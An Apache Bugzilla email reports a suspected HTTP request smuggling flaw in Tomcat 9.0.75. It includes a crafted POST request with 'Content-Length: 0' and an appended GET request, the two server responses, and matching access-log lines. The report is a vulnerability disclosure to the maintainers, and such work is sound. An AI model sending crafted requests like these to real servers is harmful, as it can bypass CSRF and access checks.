https://bz.apache.org/bugzilla/show_bug.cgi?id=67300

            Bug ID: 67300
           Summary: Suspected HTTP request smuggling vulnerability
           Product: Tomcat 9
           Version: 9.0.75
          Hardware: PC
                OS: Linux
            Status: NEW
          Severity: normal
          Priority: P2
         Component: Catalina
          Assignee: dev@tomcat.apache.org
          Reporter: digital...@huawei.com
  Target Milestone: -----

It is suspected that an HTTP request smuggling vulnerability exists. An
attacker can construct another request in the message body to achieve the
attack effect.
Construct the following packet. Because Content-Length: 0, the messages after
line 19 are processed as the second request.

The Wireshark tool is used to capture tcpdump. It is found that the sender
sends only one packet, but Tomcat responds twice. In addition, two records are
recorded in the localhost_access log.

eg
===============================================================================
POST / HTTP/1.1
Host: XXXXXXXX:8443
Cookie: sessionId=7E0E45CDE615B204BD8426EA280ED3FDDFDF3822CEF1EB41
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://135.191.162.133:8443/html/common/main.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded

GET / HTTP/1.1
Host: XXXXXXXX:8443
Cookie: sessionId=7E0E45CDE615B204BD8426EA280ED3FDDFDF3822CEF1EB41
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://135.191.162.133:8443/html/common/main.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

=====================================================================

response
HTTP/1.1 403 
Set-Cookie: sessionId=FB4EBCD594EE7940D6603A976874DBA63A862B26438057BC; Path=/;
Secure; HttpOnly; SameSite=Lax
Cache-Control: no-cache, no-store
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=3153600;includeSubDomains
Referrer-Policy: same-origin
Content-Type: text/html;charset=UTF-8
Content-Length: 18
Date: Thu, 07 Sep 2023 23:15:10 GMT
Keep-Alive: timeout=20
Connection: keep-alive

InValid CSRF TokenHTTP/1.1 200 
Set-Cookie: sessionId=C4DE25F4A422816F6C444CD3F447D91382A1921BBA8A3FE0; Path=/;
Secure; HttpOnly; SameSite=Lax
Cache-Control: no-cache, no-store
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=3153600;includeSubDomains
Referrer-Policy: same-origin
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Thu, 07 Sep 2023 23:15:10 GMT
Connection: close

=====================================================================

log in localhost_access.log


[07/Sep/2023:23:15:10 +0000]^180.59.110.8^-^POST / HTTP/1.1^Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/105.0.5195.102
Safari/537.36^https://XXXXXXXX:8443/html/common/main.jsp^-^application/x-www-form-urlencoded^zh-CN,zh;q=0.9^text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9^gzip,
deflate^403^18^0.003^
[07/Sep/2023:23:15:10 +0000]^180.59.110.8^-^GET / HTTP/1.1^Mozilla/5.0 (Windows
NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/105.0.5195.102
Safari/537.36^https://XXXXXXXX:8443/html/common/main.jsp^-^-^zh-CN,zh;q=0.9^text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9^gzip,
deflate^200^33142^0.011^

-- 
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org

Reply via email to